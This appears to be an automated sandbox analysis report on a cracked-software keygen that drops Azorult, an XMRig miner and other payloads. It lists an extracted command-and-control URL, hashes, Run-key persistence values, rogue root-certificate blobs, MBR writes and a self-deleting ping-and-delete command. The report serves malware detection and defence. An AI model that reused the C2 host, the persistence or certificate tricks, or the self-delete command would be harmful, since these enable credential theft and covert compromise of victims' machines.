Analysis
-
max time kernel
1263s -
max time network
1763s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
26-03-2021 23:40
Static task
static1
Behavioral task
behavioral1
Sample
[CRACKHEAP.NET]PW12345Easeus_Data_Recovery_Wizard_8_keygen.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
[CRACKHEAP.NET]PW12345Easeus_Data_Recovery_Wizard_8_keygen.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
[CRACKHEAP.NET]PW12345Easeus_Data_Recovery_Wizard_8_keygen.exe
Resource
win10v20201028
General
-
Target
[CRACKHEAP.NET]PW12345Easeus_Data_Recovery_Wizard_8_keygen.exe
-
Size
9.2MB
-
MD5
b806267b5f3b7760df56396b1cf05e6d
-
SHA1
5166d4c1d3e476281d9e991eababc3e4aa9ec5ad
-
SHA256
f95d12a0dbd8199d16f48d8e4cbe69a8d4ec16c534efb36e52a662664e1c1783
-
SHA512
30e393bb3898edc8ab5fb04e62ce421ddf3903075f59e3880408b300f46bb74a85088336d6e1203b2101152cebeef4c1730290b41ca77604ecb722c8f627328b
Malware Config
Extracted
azorult
http://kvaka.li/1210776429.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Nirsoft 4 IoCs
resource yara_rule behavioral4/files/0x000100000001ab6f-65.dat Nirsoft behavioral4/files/0x000100000001ab6f-67.dat Nirsoft behavioral4/files/0x000100000001ab94-84.dat Nirsoft behavioral4/files/0x000100000001ab94-85.dat Nirsoft -
XMRig Miner Payload 4 IoCs
resource yara_rule behavioral4/memory/1376-76-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral4/memory/1376-77-0x00000001402CA898-mapping.dmp xmrig behavioral4/memory/1376-80-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral4/memory/1376-88-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Blocklisted process makes network request 2 IoCs
flow pid Process 58 1376 msiexec.exe 106 1376 msiexec.exe -
Executes dropped EXE 22 IoCs
pid Process 556 keygen-pr.exe 652 keygen-step-1.exe 860 keygen-step-3.exe 1132 keygen-step-4.exe 4376 key.exe 4528 Setup.exe 3932 26FF190E7AE0F7C7.exe 4688 26FF190E7AE0F7C7.exe 4412 Install.exe 1572 file.exe 3392 1616802297055.exe 3292 CAD7.tmp.exe 552 1616802299571.exe 972 md2_2efs.exe 1080 BTRSetp.exe 4616 askinstall20.exe 4556 gcttt.exe 4784 jfiag3g_gg.exe 1704 jfiag3g_gg.exe 416 ThunderFW.exe 1092 jfiag3g_gg.exe 2380 jfiag3g_gg.exe -
resource yara_rule behavioral4/files/0x000200000001ab59-29.dat office_xlm_macros -
resource yara_rule behavioral4/files/0x0002000000015660-95.dat upx behavioral4/files/0x0002000000015660-94.dat upx behavioral4/files/0x0004000000015637-123.dat upx behavioral4/files/0x0004000000015637-122.dat upx behavioral4/files/0x0004000000015637-127.dat upx behavioral4/files/0x0004000000015637-126.dat upx behavioral4/files/0x0004000000015637-137.dat upx behavioral4/files/0x0004000000015637-138.dat upx behavioral4/files/0x0004000000015637-141.dat upx behavioral4/files/0x0004000000015637-142.dat upx -
Loads dropped DLL 1 IoCs
pid Process 4644 MsiExec.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe" gcttt.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CAD7.tmp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\wwwupdat3 = "C:\\Users\\Admin\\AppData\\Roaming\\wwwupdat3.exe" CAD7.tmp.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Setup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 26FF190E7AE0F7C7.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 26FF190E7AE0F7C7.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md2_2efs.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 79 ip-api.com -
Writes to the Master Boot Record (MBR) 1 TTPs 3 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 26FF190E7AE0F7C7.exe File opened for modification \??\PhysicalDrive0 26FF190E7AE0F7C7.exe File opened for modification \??\PhysicalDrive0 Setup.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 4528 Setup.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 3932 set thread context of 5036 3932 26FF190E7AE0F7C7.exe 101 PID 3292 set thread context of 2228 3292 CAD7.tmp.exe 108 PID 3292 set thread context of 1376 3292 CAD7.tmp.exe 112 PID 3932 set thread context of 1868 3932 26FF190E7AE0F7C7.exe 115 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName 26FF190E7AE0F7C7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 26FF190E7AE0F7C7.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName 26FF190E7AE0F7C7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 26FF190E7AE0F7C7.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName 26FF190E7AE0F7C7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 26FF190E7AE0F7C7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 26FF190E7AE0F7C7.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc 26FF190E7AE0F7C7.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName 26FF190E7AE0F7C7.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc 26FF190E7AE0F7C7.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc 26FF190E7AE0F7C7.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc 26FF190E7AE0F7C7.exe -
Kills process with taskkill 2 IoCs
pid Process 3620 taskkill.exe 4188 taskkill.exe -
Modifies data under HKEY_USERS 1 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\PegasPc file.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576 Setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 file.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e file.exe -
Runs ping.exe 1 TTPs 5 IoCs
pid Process 616 PING.EXE 2216 PING.EXE 2412 PING.EXE 4624 PING.EXE 1540 PING.EXE -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 3392 1616802297055.exe 3392 1616802297055.exe 1572 file.exe 1572 file.exe 552 1616802299571.exe 552 1616802299571.exe 1572 file.exe 1572 file.exe 1572 file.exe 1572 file.exe 1572 file.exe 1572 file.exe 1704 jfiag3g_gg.exe 1704 jfiag3g_gg.exe 1092 jfiag3g_gg.exe 1092 jfiag3g_gg.exe 2380 jfiag3g_gg.exe 2380 jfiag3g_gg.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 2744 msiexec.exe Token: SeIncreaseQuotaPrivilege 2744 msiexec.exe Token: SeSecurityPrivilege 3184 msiexec.exe Token: SeCreateTokenPrivilege 2744 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2744 msiexec.exe Token: SeLockMemoryPrivilege 2744 msiexec.exe Token: SeIncreaseQuotaPrivilege 2744 msiexec.exe Token: SeMachineAccountPrivilege 2744 msiexec.exe Token: SeTcbPrivilege 2744 msiexec.exe Token: SeSecurityPrivilege 2744 msiexec.exe Token: SeTakeOwnershipPrivilege 2744 msiexec.exe Token: SeLoadDriverPrivilege 2744 msiexec.exe Token: SeSystemProfilePrivilege 2744 msiexec.exe Token: SeSystemtimePrivilege 2744 msiexec.exe Token: SeProfSingleProcessPrivilege 2744 msiexec.exe Token: SeIncBasePriorityPrivilege 2744 msiexec.exe Token: SeCreatePagefilePrivilege 2744 msiexec.exe Token: SeCreatePermanentPrivilege 2744 msiexec.exe Token: SeBackupPrivilege 2744 msiexec.exe Token: SeRestorePrivilege 2744 msiexec.exe Token: SeShutdownPrivilege 2744 msiexec.exe Token: SeDebugPrivilege 2744 msiexec.exe Token: SeAuditPrivilege 2744 msiexec.exe Token: SeSystemEnvironmentPrivilege 2744 msiexec.exe Token: SeChangeNotifyPrivilege 2744 msiexec.exe Token: SeRemoteShutdownPrivilege 2744 msiexec.exe Token: SeUndockPrivilege 2744 msiexec.exe Token: SeSyncAgentPrivilege 2744 msiexec.exe Token: SeEnableDelegationPrivilege 2744 msiexec.exe Token: SeManageVolumePrivilege 2744 msiexec.exe Token: SeImpersonatePrivilege 2744 msiexec.exe Token: SeCreateGlobalPrivilege 2744 msiexec.exe Token: SeCreateTokenPrivilege 2744 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2744 msiexec.exe Token: SeLockMemoryPrivilege 2744 msiexec.exe Token: SeIncreaseQuotaPrivilege 2744 msiexec.exe Token: SeMachineAccountPrivilege 2744 msiexec.exe Token: SeTcbPrivilege 2744 msiexec.exe Token: SeSecurityPrivilege 2744 msiexec.exe Token: SeTakeOwnershipPrivilege 2744 msiexec.exe Token: SeLoadDriverPrivilege 2744 msiexec.exe Token: SeSystemProfilePrivilege 2744 msiexec.exe Token: SeSystemtimePrivilege 2744 msiexec.exe Token: SeProfSingleProcessPrivilege 2744 msiexec.exe Token: SeIncBasePriorityPrivilege 2744 msiexec.exe Token: SeCreatePagefilePrivilege 2744 msiexec.exe Token: SeCreatePermanentPrivilege 2744 msiexec.exe Token: SeBackupPrivilege 2744 msiexec.exe Token: SeRestorePrivilege 2744 msiexec.exe Token: SeShutdownPrivilege 2744 msiexec.exe Token: SeDebugPrivilege 2744 msiexec.exe Token: SeAuditPrivilege 2744 msiexec.exe Token: SeSystemEnvironmentPrivilege 2744 msiexec.exe Token: SeChangeNotifyPrivilege 2744 msiexec.exe Token: SeRemoteShutdownPrivilege 2744 msiexec.exe Token: SeUndockPrivilege 2744 msiexec.exe Token: SeSyncAgentPrivilege 2744 msiexec.exe Token: SeEnableDelegationPrivilege 2744 msiexec.exe Token: SeManageVolumePrivilege 2744 msiexec.exe Token: SeImpersonatePrivilege 2744 msiexec.exe Token: SeCreateGlobalPrivilege 2744 msiexec.exe Token: SeCreateTokenPrivilege 2744 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2744 msiexec.exe Token: SeLockMemoryPrivilege 2744 msiexec.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2744 msiexec.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
pid Process 4528 Setup.exe 3932 26FF190E7AE0F7C7.exe 4688 26FF190E7AE0F7C7.exe 5036 firefox.exe 3392 1616802297055.exe 1868 firefox.exe 552 1616802299571.exe 416 ThunderFW.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4708 wrote to memory of 4244 4708 [CRACKHEAP.NET]PW12345Easeus_Data_Recovery_Wizard_8_keygen.exe 78 PID 4708 wrote to memory of 4244 4708 [CRACKHEAP.NET]PW12345Easeus_Data_Recovery_Wizard_8_keygen.exe 78 PID 4708 wrote to memory of 4244 4708 [CRACKHEAP.NET]PW12345Easeus_Data_Recovery_Wizard_8_keygen.exe 78 PID 4244 wrote to memory of 556 4244 cmd.exe 81 PID 4244 wrote to memory of 556 4244 cmd.exe 81 PID 4244 wrote to memory of 556 4244 cmd.exe 81 PID 4244 wrote to memory of 652 4244 cmd.exe 82 PID 4244 wrote to memory of 652 4244 cmd.exe 82 PID 4244 wrote to memory of 652 4244 cmd.exe 82 PID 4244 wrote to memory of 860 4244 cmd.exe 83 PID 4244 wrote to memory of 860 4244 cmd.exe 83 PID 4244 wrote to memory of 860 4244 cmd.exe 83 PID 4244 wrote to memory of 1132 4244 cmd.exe 84 PID 4244 wrote to memory of 1132 4244 cmd.exe 84 PID 4244 wrote to memory of 1132 4244 cmd.exe 84 PID 556 wrote to memory of 4376 556 keygen-pr.exe 85 PID 556 wrote to memory of 4376 556 keygen-pr.exe 85 PID 556 wrote to memory of 4376 556 keygen-pr.exe 85 PID 1132 wrote to memory of 4528 1132 keygen-step-4.exe 86 PID 1132 wrote to memory of 4528 1132 keygen-step-4.exe 86 PID 1132 wrote to memory of 4528 1132 keygen-step-4.exe 86 PID 4376 wrote to memory of 4484 4376 key.exe 87 PID 4376 wrote to memory of 4484 4376 key.exe 87 PID 4376 wrote to memory of 4484 4376 key.exe 87 PID 860 wrote to memory of 2180 860 keygen-step-3.exe 88 PID 860 wrote to memory of 2180 860 keygen-step-3.exe 88 PID 860 wrote to memory of 2180 860 keygen-step-3.exe 88 PID 2180 wrote to memory of 2412 2180 cmd.exe 90 PID 2180 wrote to memory of 2412 2180 cmd.exe 90 PID 2180 wrote to memory of 2412 2180 cmd.exe 90 PID 4528 wrote to memory of 2744 4528 Setup.exe 91 PID 4528 wrote to memory of 2744 4528 Setup.exe 91 PID 4528 wrote to memory of 2744 4528 Setup.exe 91 PID 4528 wrote to memory of 3932 4528 Setup.exe 93 PID 4528 wrote to memory of 3932 4528 Setup.exe 93 PID 4528 wrote to memory of 3932 4528 Setup.exe 93 PID 4528 wrote to memory of 4688 4528 Setup.exe 94 PID 4528 wrote to memory of 4688 4528 Setup.exe 94 PID 4528 wrote to memory of 4688 4528 Setup.exe 94 PID 3184 wrote to memory of 4644 3184 msiexec.exe 95 PID 3184 wrote to memory of 4644 3184 msiexec.exe 95 PID 3184 wrote to memory of 4644 3184 msiexec.exe 95 PID 4528 wrote to memory of 4360 4528 Setup.exe 96 PID 4528 wrote to memory of 4360 4528 Setup.exe 96 PID 4528 wrote to memory of 4360 4528 Setup.exe 96 PID 1132 wrote to memory of 4412 1132 keygen-step-4.exe 97 PID 1132 wrote to memory of 4412 1132 keygen-step-4.exe 97 PID 4360 wrote to memory of 4624 4360 cmd.exe 99 PID 4360 wrote to memory of 4624 4360 cmd.exe 99 PID 4360 wrote to memory of 4624 4360 cmd.exe 99 PID 1132 wrote to memory of 1572 1132 keygen-step-4.exe 100 PID 1132 wrote to memory of 1572 1132 keygen-step-4.exe 100 PID 1132 wrote to memory of 1572 1132 keygen-step-4.exe 100 PID 3932 wrote to memory of 5036 3932 26FF190E7AE0F7C7.exe 101 PID 3932 wrote to memory of 5036 3932 26FF190E7AE0F7C7.exe 101 PID 3932 wrote to memory of 5036 3932 26FF190E7AE0F7C7.exe 101 PID 3932 wrote to memory of 5036 3932 26FF190E7AE0F7C7.exe 101 PID 3932 wrote to memory of 5036 3932 26FF190E7AE0F7C7.exe 101 PID 3932 wrote to memory of 5036 3932 26FF190E7AE0F7C7.exe 101 PID 4688 wrote to memory of 4888 4688 26FF190E7AE0F7C7.exe 102 PID 4688 wrote to memory of 4888 4688 26FF190E7AE0F7C7.exe 102 PID 4688 wrote to memory of 4888 4688 26FF190E7AE0F7C7.exe 102 PID 4888 wrote to memory of 3620 4888 cmd.exe 104 PID 4888 wrote to memory of 3620 4888 cmd.exe 104
Processes
-
C:\Users\Admin\AppData\Local\Temp\[CRACKHEAP.NET]PW12345Easeus_Data_Recovery_Wizard_8_keygen.exe"C:\Users\Admin\AppData\Local\Temp\[CRACKHEAP.NET]PW12345Easeus_Data_Recovery_Wizard_8_keygen.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4708 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:4244 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:556 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4376 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵PID:4484
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:652
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:860 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:2412
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1132 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4528 -
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"5⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2744
-
-
C:\Users\Admin\AppData\Local\Temp\26FF190E7AE0F7C7.exeC:\Users\Admin\AppData\Local\Temp\26FF190E7AE0F7C7.exe 0011 installp15⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetThreadContext
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3932 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
- Suspicious use of SetWindowsHookEx
PID:5036
-
-
C:\Users\Admin\AppData\Roaming\1616802297055.exe"C:\Users\Admin\AppData\Roaming\1616802297055.exe" /sjson "C:\Users\Admin\AppData\Roaming\1616802297055.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3392
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
- Suspicious use of SetWindowsHookEx
PID:1868
-
-
